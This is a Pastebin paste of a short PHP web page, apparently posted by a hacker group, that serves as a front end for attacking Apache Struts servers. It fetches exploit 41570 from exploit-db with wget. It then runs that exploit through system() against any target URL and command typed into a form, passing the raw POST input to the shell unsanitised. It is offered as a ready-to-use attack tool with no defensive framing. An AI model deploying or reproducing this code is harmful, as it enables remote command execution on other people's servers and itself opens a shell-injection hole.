Advertisement
AZZATSSINS_CYBERSERK

Apache Struts

Jun 21st, 2017
256
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.34 KB | None | 0 0
  1. <?php
  2. /*AZZATSSINS*/
  3. echo "<title>Apache Strust</title><form method=post>URL : <input name=target><br>COMMAND : <input name=cmd><br><input type=submit value=RUN name=azx></form><br><br><pre>";
  4. `rm 41570 && wget https://www.exploit-db.com/download/41570`;
  5. if($_POST["azx"]){
  6. echo system('python 41570 '.$_POST["target"].' "'.$_POST["cmd"].'"');}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement